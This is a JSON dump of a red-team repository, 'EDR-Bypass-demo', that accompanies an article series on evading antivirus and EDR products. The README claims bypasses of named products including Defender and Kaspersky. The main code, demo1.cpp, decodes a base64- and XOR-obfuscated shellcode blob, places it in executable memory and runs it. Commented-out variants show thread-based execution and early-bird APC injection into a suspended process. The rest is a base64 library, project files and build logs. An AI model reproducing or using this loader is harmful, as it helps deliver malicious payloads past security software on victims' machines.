[
  {
    "path": "README.md",
    "content": "# EDR-Bypass-demo\nSome demos to bypass EDRs or AVs by 78itsT3@m\n\n## This repository holds the sample code for the 7bits article series \"Red Team Development Basics - Basic AV Evasion\"\n\n### Follow our WeChat official account - Zbits2022\n\n![](/images/qrcode.jpg)\n\n### Demos 1-3 accompany \"Red Team Development Basics - Basic AV Evasion (Part 1)\"\n\n- demo1:\n\n  C++ code; evades detection of the shellcode using disableETW, shellcode encryption, and import table hiding\n\n- demo2:\n\n  C# code; bypasses AV using string encryption, XOR encryption, and sandbox evasion.\n\n- demo3:\n\n  C# code; improves the shellcode loading method of demo2 by modifying SharpInjector to load the shellcode with EtwpCreateEtwThread.\n\n### Demos 4-5 accompany \"Red Team Development Basics - Basic AV Evasion (Part 2)\"\n\n- demo4:\n\n  C++ code; the simplest syscall example\n\n- demo5:\n\n  C++ code; uses the SysWhispers3 jump method to bypass static checks for syscalls\n\n### Demo 6 accompanies \"Red Team Development Basics - Basic AV Evasion (Part 3)\"\n\n- demo6:\n\n  C++ code; modifies RefleXXion so that it unhooks user32.dll.\n\n### chapter4 demo1-4 accompany \"Red Team Development Basics - Basic AV Evasion (Part 4)\"\n\nAll of the examples below disregard network traffic signatures:\n\n- demo1: base64 + XOR obfuscated shellcode; bypasses 360 and Huorong.\n\n![](/images/360.png)\n\n![](/images/hr.png)\n\n- demo2: strengthened static obfuscation; bypasses Defender and McAfee.\n\n![](/images/def.png)\n\n![](/images/mcafee.png)\n\n- demo3: adds syscall and APC invocation; bypasses Kaspersky EDR\n\n![](/images/kar.png)\n\n- demo4: adds in-memory encryption of the beacon; bypasses ESET EDR\n\n![](/images/eset.png)\n\n\n"
  },
  {
    "path": "chapter4-demo1/demo1/Debug/demo1.log",
    "content": "﻿  demo1.vcxproj -> E:\\7bits_demo\\demo1\\demo1\\Debug\\demo1.exe\r\n"
  },
  {
    "path": "chapter4-demo1/demo1/Debug/demo1.tlog/demo1.lastbuildstate",
    "content": "#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0\r\nDebug|Win32|E:\\7bits_demo\\demo1\\demo1\\|\r\n"
  },
  {
    "path": "chapter4-demo1/demo1/Header.h",
    "content": "#pragma once\r\n\r\nconst int XOR_KEY{ 8 };"
  },
  {
    "path": "chapter4-demo1/demo1/base64.cpp",
    "content": "/*\n   base64.cpp and base64.h\n\n   base64 encoding and decoding with C++.\n   More information at\n\t https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp\n\n   Version: 2.rc.08 (release candidate)\n\n   Copyright (C) 2004-2017, 2020, 2021 René Nyffenegger\n\n   This source code is provided 'as-is', without any express or implied\n   warranty. In no event will the author be held liable for any damages\n   arising from the use of this software.\n\n   Permission is granted to anyone to use this software for any purpose,\n   including commercial applications, and to alter it and redistribute it\n   freely, subject to the following restrictions:\n\n   1. The origin of this source code must not be misrepresented; you must not\n\t  claim that you wrote the original source code. If you use this source code\n\t  in a product, an acknowledgment in the product documentation would be\n\t  appreciated but is not required.\n\n   2. Altered source versions must be plainly marked as such, and must not be\n\t  misrepresented as being the original source code.\n\n   3. 
This notice may not be removed or altered from any source distribution.\n\n   René Nyffenegger rene.nyffenegger@adp-gmbh.ch\n\n*/\n\n#include \"base64.h\"\n\n#include <algorithm>\n#include <stdexcept>\n\n//\n// Depending on the url parameter in base64_chars, one of\n// two sets of base64 characters needs to be chosen.\n// They differ in their last two characters.\n//\nstatic const char* base64_chars[2] = {\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"+/\",\n\n\t\t\t \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\t\t\t \"abcdefghijklmnopqrstuvwxyz\"\n\t\t\t \"0123456789\"\n\t\t\t \"-_\" };\n\nstatic unsigned int pos_of_char(const unsigned char chr) {\n\t//\n\t// Return the position of chr within base64_encode()\n\t//\n\n\tif (chr >= 'A' && chr <= 'Z') return chr - 'A';\n\telse if (chr >= 'a' && chr <= 'z') return chr - 'a' + ('Z' - 'A') + 1;\n\telse if (chr >= '0' && chr <= '9') return chr - '0' + ('Z' - 'A') + ('z' - 'a') + 2;\n\telse if (chr == '+' || chr == '-') return 62; // Be liberal with input and accept both url ('-') and non-url ('+') base 64 characters (\n\telse if (chr == '/' || chr == '_') return 63; // Ditto for '/' and '_'\n\telse\n\t\t//\n\t\t// 2020-10-23: Throw std::exception rather than const char*\n\t\t//(Pablo Martin-Gomez, https://github.com/Bouska)\n\t\t//\n\t\tthrow std::runtime_error(\"Input is not valid base64-encoded data.\");\n}\n\nstatic std::string insert_linebreaks(std::string str, size_t distance) {\n\t//\n\t// Provided by https://github.com/JomaCorpFX, adapted by me.\n\t//\n\tif (!str.length()) {\n\t\treturn \"\";\n\t}\n\n\tsize_t pos = distance;\n\n\twhile (pos < str.size()) {\n\t\tstr.insert(pos, \"\\n\");\n\t\tpos += distance + 1;\n\t}\n\n\treturn str;\n}\n\ntemplate <typename String, unsigned int line_length>\nstatic std::string encode_with_line_breaks(String s) {\n\treturn insert_linebreaks(base64_encode(s, false), line_length);\n}\n\ntemplate <typename String>\nstatic 
std::string encode_pem(String s) {\n\treturn encode_with_line_breaks<String, 64>(s);\n}\n\ntemplate <typename String>\nstatic std::string encode_mime(String s) {\n\treturn encode_with_line_breaks<String, 76>(s);\n}\n\ntemplate <typename String>\nstatic std::string encode(String s, bool url) {\n\treturn base64_encode(reinterpret_cast<const unsigned char*>(s.data()), s.length(), url);\n}\n\nstd::string base64_encode(unsigned char const* bytes_to_encode, size_t in_len, bool url) {\n\n\tsize_t len_encoded = (in_len + 2) / 3 * 4;\n\n\tunsigned char trailing_char = url ? '.' : '=';\n\n\t//\n\t// Choose set of base64 characters. They differ\n\t// for the last two positions, depending on the url\n\t// parameter.\n\t// A bool (as is the parameter url) is guaranteed\n\t// to evaluate to either 0 or 1 in C++ therefore,\n\t// the correct character set is chosen by subscripting\n\t// base64_chars with url.\n\t//\n\tconst char* base64_chars_ = base64_chars[url];\n\n\tstd::string ret;\n\tret.reserve(len_encoded);\n\n\tunsigned int pos = 0;\n\n\twhile (pos < in_len) {\n\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0xfc) >> 2]);\n\n\t\tif (pos + 1 < in_len) {\n\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 0] & 0x03) << 4) + ((bytes_to_encode[pos + 1] & 0xf0) >> 4)]);\n\n\t\t\tif (pos + 2 < in_len) {\n\t\t\t\tret.push_back(base64_chars_[((bytes_to_encode[pos + 1] & 0x0f) << 2) + ((bytes_to_encode[pos + 2] & 0xc0) >> 6)]);\n\t\t\t\tret.push_back(base64_chars_[bytes_to_encode[pos + 2] & 0x3f]);\n\t\t\t}\n\t\t\telse {\n\t\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 1] & 0x0f) << 2]);\n\t\t\t\tret.push_back(trailing_char);\n\t\t\t}\n\t\t}\n\t\telse {\n\n\t\t\tret.push_back(base64_chars_[(bytes_to_encode[pos + 0] & 0x03) << 4]);\n\t\t\tret.push_back(trailing_char);\n\t\t\tret.push_back(trailing_char);\n\t\t}\n\n\t\tpos += 3;\n\t}\n\n\n\treturn ret;\n}\n\ntemplate <typename String>\nstatic std::string decode(String encoded_string, bool 
remove_linebreaks) {\n\t//\n\t// decode(…) is templated so that it can be used with String = const std::string&\n\t// or std::string_view (requires at least C++17)\n\t//\n\n\tif (encoded_string.empty()) return std::string();\n\n\tif (remove_linebreaks) {\n\n\t\tstd::string copy(encoded_string);\n\n\t\tcopy.erase(std::remove(copy.begin(), copy.end(), '\\n'), copy.end());\n\n\t\treturn base64_decode(copy, false);\n\t}\n\n\tsize_t length_of_string = encoded_string.length();\n\tsize_t pos = 0;\n\n\t//\n\t// The approximate length (bytes) of the decoded string might be one or\n\t// two bytes smaller, depending on the amount of trailing equal signs\n\t// in the encoded string. This approximation is needed to reserve\n\t// enough space in the string to be returned.\n\t//\n\tsize_t approx_length_of_decoded_string = length_of_string / 4 * 3;\n\tstd::string ret;\n\tret.reserve(approx_length_of_decoded_string);\n\n\twhile (pos < length_of_string) {\n\t\t//\n\t\t// Iterate over encoded input string in chunks. The size of all\n\t\t// chunks except the last one is 4 bytes.\n\t\t//\n\t\t// The last chunk might be padded with equal signs or dots\n\t\t// in order to make it 4 bytes in size as well, but this\n\t\t// is not required as per RFC 2045.\n\t\t//\n\t\t// All chunks except the last one produce three output bytes.\n\t\t//\n\t\t// The last chunk produces at least one and up to three bytes.\n\t\t//\n\n\t\tsize_t pos_of_char_1 = pos_of_char(encoded_string[pos + 1]);\n\n\t\t//\n\t\t// Emit the first output byte that is produced in each chunk:\n\t\t//\n\t\tret.push_back(static_cast<std::string::value_type>(((pos_of_char(encoded_string[pos + 0])) << 2) + ((pos_of_char_1 & 0x30) >> 4)));\n\n\t\tif ((pos + 2 < length_of_string) &&  // Check for data that is not padded with equal signs (which is allowed by RFC 2045)\n\t\t\tencoded_string[pos + 2] != '=' &&\n\t\t\tencoded_string[pos + 2] != '.'            // accept URL-safe base 64 strings, too, so check for '.' 
also.\n\t\t\t)\n\t\t{\n\t\t\t//\n\t\t\t// Emit a chunk's second byte (which might not be produced in the last chunk).\n\t\t\t//\n\t\t\tunsigned int pos_of_char_2 = pos_of_char(encoded_string[pos + 2]);\n\t\t\tret.push_back(static_cast<std::string::value_type>(((pos_of_char_1 & 0x0f) << 4) + ((pos_of_char_2 & 0x3c) >> 2)));\n\n\t\t\tif ((pos + 3 < length_of_string) &&\n\t\t\t\tencoded_string[pos + 3] != '=' &&\n\t\t\t\tencoded_string[pos + 3] != '.'\n\t\t\t\t)\n\t\t\t{\n\t\t\t\t//\n\t\t\t\t// Emit a chunk's third byte (which might not be produced in the last chunk).\n\t\t\t\t//\n\t\t\t\tret.push_back(static_cast<std::string::value_type>(((pos_of_char_2 & 0x03) << 6) + pos_of_char(encoded_string[pos + 3])));\n\t\t\t}\n\t\t}\n\n\t\tpos += 4;\n\t}\n\n\treturn ret;\n}\n\nstd::string base64_decode(std::string const& s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\nstd::string base64_encode(std::string const& s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string const& s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string const& s) {\n\treturn encode_mime(s);\n}\n\n#if __cplusplus >= 201703L\n//\n// Interface with std::string_view rather than const std::string&\n// Requires C++17\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\n//\n\nstd::string base64_encode(std::string_view s, bool url) {\n\treturn encode(s, url);\n}\n\nstd::string base64_encode_pem(std::string_view s) {\n\treturn encode_pem(s);\n}\n\nstd::string base64_encode_mime(std::string_view s) {\n\treturn encode_mime(s);\n}\n\nstd::string base64_decode(std::string_view s, bool remove_linebreaks) {\n\treturn decode(s, remove_linebreaks);\n}\n\n#endif  // __cplusplus >= 201703L\n"
  },
  {
    "path": "chapter4-demo1/demo1/base64.h",
    "content": "//\n//  base64 encoding and decoding with C++.\n//  Version: 2.rc.08 (release candidate)\n//\n\n#ifndef BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\n#define BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A\n\n#include <string>\n\n#if __cplusplus >= 201703L\n#include <string_view>\n#endif  // __cplusplus >= 201703L\n\nstd::string base64_encode(std::string const& s, bool url = false);\nstd::string base64_encode_pem(std::string const& s);\nstd::string base64_encode_mime(std::string const& s);\n\nstd::string base64_decode(std::string const& s, bool remove_linebreaks = false);\nstd::string base64_encode(unsigned char const*, size_t len, bool url = false);\n\n#if __cplusplus >= 201703L\n//\n// Interface with std::string_view rather than const std::string&\n// Requires C++17\n// Provided by Yannic Bonenberger (https://github.com/Yannic)\n//\nstd::string base64_encode(std::string_view s, bool url = false);\nstd::string base64_encode_pem(std::string_view s);\nstd::string base64_encode_mime(std::string_view s);\n\nstd::string base64_decode(std::string_view s, bool remove_linebreaks = false);\n#endif  // __cplusplus >= 201703L\n\n#endif /* BASE64_H_C0CE2A47_D10E_42C9_A27C_C883944E704A */\n"
  },
  {
    "path": "chapter4-demo1/demo1/demo1.cpp",
    "content": "// demo1.cpp : This file contains the 'main' function. Program execution begins and ends there.\r\n//\r\n\r\n#include <iostream>\r\n#include <windows.h>\r\n#include \"header.h\"\r\n#include \"base64.h\"\r\nusing namespace std;\r\n\r\nunsigned char* ReadProcessBlob(const char* fnamSc, DWORD* szSc)\r\n{\r\n\tDWORD szRead{ 0 };\r\n\r\n\tHANDLE hFile = CreateFileA(\r\n\t\tfnamSc,\r\n\t\tGENERIC_READ,\r\n\t\tNULL,\r\n\t\tNULL,\r\n\t\tOPEN_EXISTING,\r\n\t\tFILE_ATTRIBUTE_NORMAL,\r\n\t\tNULL\r\n\t);\r\n\r\n\tif (INVALID_HANDLE_VALUE == hFile)\r\n\t\treturn nullptr;\r\n\r\n\tSIZE_T szFile = GetFileSize(hFile, NULL);\r\n\t*szSc = szFile;\r\n\r\n\tunsigned char* raw = new unsigned char[szFile];\r\n\tunsigned char* sc = new unsigned char[szFile];\r\n\r\n\tif (!ReadFile(hFile, raw, szFile, &szRead, NULL))\r\n\t\treturn nullptr;\r\n\r\n\tint i;\r\n\r\n\tfor (i = 0; i < szRead; i++) {\r\n\t\tsc[i] = raw[i] ^ XOR_KEY;\r\n\t}\r\n\r\n\treturn sc;\r\n}\r\n\r\nint main()\r\n{\r\n\tbool all_tests_passed = false;\r\n\r\n\tstd::string rest2_reference = \"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\";\r\n\r\n\tstd::string rest2_decoded = base64_decode(rest2_reference);\r\n\r\n\tconst char* S = rest2_decoded.c_str();\r\n\r\n\r\n\tunsigned char* sc = new unsigned char[rest2_decoded.length()];\r\n\r\n\tfor (int i = 0; i < rest2_decoded.length(); i++) {\r\n\t\tsc[i] = S[i] ^ XOR_KEY;\r\n\t}\r\n\r\n\tvoid * exec = VirtualAlloc(0, rest2_decoded.length(), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tmemcpy(exec, sc, rest2_decoded.length());\r\n\t\r\n\r\n\r\n\t//unsigned const char* S=\r\n\r\n\t((void(*)())exec)();\r\n\t\r\n\r\n\t/*\r\n\tCreateThread \r\n\r\n\tHANDLE hThread = CreateThread(\r\n\t\tNULL,    \r\n\t\t0,      \r\n\t\t(LPTHREAD_START_ROUTINE)exec, \r\n\t\tNULL, \r\n\t\t0,\r\n\t\tNULL);\r\n\tif (hThread == NULL)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tWaitForSingleObject(hThread, INFINITE);\r\n\r\n\tCloseHandle(hThread);\r\n\t*/\r\n\r\n\t/*\r\n\tearly bird 
APC\r\n\r\n\tSIZE_T shellSize = szSc;\r\n\tSTARTUPINFOA si = { 0 };\r\n\tPROCESS_INFORMATION pi = { 0 };\r\n\r\n\tCreateProcessA(\"C:\\\\Windows\\\\System32\\\\calc.exe\", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);\r\n\tHANDLE victimProcess = pi.hProcess;\r\n\tHANDLE threadHandle = pi.hThread;\r\n\r\n\tLPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n\tPTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;\r\n\r\n\tWriteProcessMemory(victimProcess, shellAddress, S, shellSize, NULL);\r\n\tQueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, NULL);\r\n\tResumeThread(threadHandle);\r\n\t*/\r\n\r\n}\r\n\r\n// Run program: Ctrl + F5 or Debug > Start Without Debugging menu\r\n// Debug program: F5 or Debug > Start Debugging menu\r\n\r\n// Tips for Getting Started: \r\n//   1. Use the Solution Explorer window to add/manage files\r\n//   2. Use the Team Explorer window to connect to source control\r\n//   3. Use the Output window to see build output and other messages\r\n//   4. Use the Error List window to view errors\r\n//   5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project\r\n//   6. In the future, to open this project again, go to File > Open > Project and select the .sln file\r\n"
  },
  {
    "path": "chapter4-demo1/demo1/demo1.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup Label=\"ProjectConfigurations\">\r\n    <ProjectConfiguration Include=\"Debug|Win32\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|Win32\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>Win32</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Debug|x64\">\r\n      <Configuration>Debug</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n    <ProjectConfiguration Include=\"Release|x64\">\r\n      <Configuration>Release</Configuration>\r\n      <Platform>x64</Platform>\r\n    </ProjectConfiguration>\r\n  </ItemGroup>\r\n  <PropertyGroup Label=\"Globals\">\r\n    <VCProjectVersion>16.0</VCProjectVersion>\r\n    <ProjectGuid>{1876F365-2DEC-42C9-B80E-B631B26FCAD8}</ProjectGuid>\r\n    <Keyword>Win32Proj</Keyword>\r\n    <RootNamespace>demo1</RootNamespace>\r\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    
<CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>true</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\r\n    <ConfigurationType>Application</ConfigurationType>\r\n    <UseDebugLibraries>false</UseDebugLibraries>\r\n    <PlatformToolset>v143</PlatformToolset>\r\n    <WholeProgramOptimization>true</WholeProgramOptimization>\r\n    <CharacterSet>Unicode</CharacterSet>\r\n  </PropertyGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\r\n  <ImportGroup Label=\"ExtensionSettings\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"Shared\">\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <ImportGroup Label=\"PropertySheets\" 
Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\r\n  </ImportGroup>\r\n  <PropertyGroup Label=\"UserMacros\" />\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <LinkIncremental>true</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <LinkIncremental>false</LinkIncremental>\r\n  </PropertyGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>Disabled</Optimization>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>Disabled</Optimization>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n   
 </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>MaxSpeed</Optimization>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\r\n    <ClCompile>\r\n      <PrecompiledHeader>\r\n      </PrecompiledHeader>\r\n      <WarningLevel>Level3</WarningLevel>\r\n      <Optimization>MaxSpeed</Optimization>\r\n      <FunctionLevelLinking>true</FunctionLevelLinking>\r\n      <IntrinsicFunctions>true</IntrinsicFunctions>\r\n      <SDLCheck>true</SDLCheck>\r\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\r\n      <ConformanceMode>true</ConformanceMode>\r\n    </ClCompile>\r\n    <Link>\r\n      <SubSystem>Console</SubSystem>\r\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\r\n      <OptimizeReferences>true</OptimizeReferences>\r\n      <GenerateDebugInformation>true</GenerateDebugInformation>\r\n    </Link>\r\n  </ItemDefinitionGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"base64.cpp\" />\r\n    <ClCompile Include=\"demo1.cpp\" 
/>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"base64.h\" />\r\n    <ClInclude Include=\"Header.h\" />\r\n  </ItemGroup>\r\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\r\n  <ImportGroup Label=\"ExtensionTargets\">\r\n  </ImportGroup>\r\n</Project>"
  },
  {
    "path": "chapter4-demo1/demo1/demo1.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <ItemGroup>\r\n    <Filter Include=\"Source Files\">\r\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\r\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Resource Files\">\r\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\r\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\r\n    </Filter>\r\n    <Filter Include=\"Resource Files\\Header Files\">\r\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\r\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>\r\n    </Filter>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClCompile Include=\"demo1.cpp\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n    <ClCompile Include=\"base64.cpp\">\r\n      <Filter>Source Files</Filter>\r\n    </ClCompile>\r\n  </ItemGroup>\r\n  <ItemGroup>\r\n    <ClInclude Include=\"Header.h\">\r\n      <Filter>Resource Files</Filter>\r\n    </ClInclude>\r\n    <ClInclude Include=\"base64.h\">\r\n      <Filter>Resource Files\\Header Files</Filter>\r\n    </ClInclude>\r\n  </ItemGroup>\r\n</Project>"
  },
  {
    "path": "chapter4-demo1/demo1/demo1.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"Current\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup />\r\n</Project>"
  },
  {
    "path": "chapter4-demo1/demo1/x64/Debug/demo1.exe.recipe",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n  <ProjectOutputs>\r\n    <ProjectOutput>\r\n      <FullPath>C:\\Users\\Admin\\Desktop\\demo1\\x64\\Debug\\demo1.exe</FullPath>\r\n    </ProjectOutput>\r\n  </ProjectOutputs>\r\n  <ContentFiles />\r\n  <SatelliteDlls />\r\n  <NonRecipeFileRefs />\r\n</Project>"
  },
  {
    "path": "chapter4-demo1/demo1/x64/Debug/demo1.log",
    "content": "﻿  base64.cpp\r\n  demo1.cpp\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(28,10): warning C4244: “=”: 从“SIZE_T”转换到“DWORD”，可能丢失数据\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(33,28): warning C4244: “参数”: 从“SIZE_T”转换到“DWORD”，可能丢失数据\r\nC:\\Users\\Admin\\Desktop\\demo1\\demo1\\demo1.cpp(38,16): warning C4018: “<”: 有符号/无符号不匹配\r\n  正在生成代码...\r\n  demo1.vcxproj -> C:\\Users\\Admin\\Desktop\\demo1\\x64\\Debug\\demo1.exe\r\n"
  },
  {
    "path": "chapter4-demo1/demo1/x64/Debug/demo1.tlog/demo1.lastbuildstate",
    "content": "PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:\r\nDebug|x64|C:\\Users\\Admin\\Desktop\\demo1\\|\r\n"
  },
  {
    "path": "chapter4-demo1/demo1/x64/Release/demo1.exe.recipe",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project>\r\n  <ProjectOutputs>\r\n    <ProjectOutput>\r\n      <FullPath>C:\\Users\\Admin\\Desktop\\demo1\\x64\\Release\\demo1.exe</FullPath>\r\n    </ProjectOutput>\r\n  </ProjectOutputs>\r\n  <ContentFiles />\r\n  <SatelliteDlls />\r\n  <NonRecipeFileRefs />\r\n</Project>"
  },
  {
    "path": "chapter4-demo1/demo1/x64/Release/demo1.log",
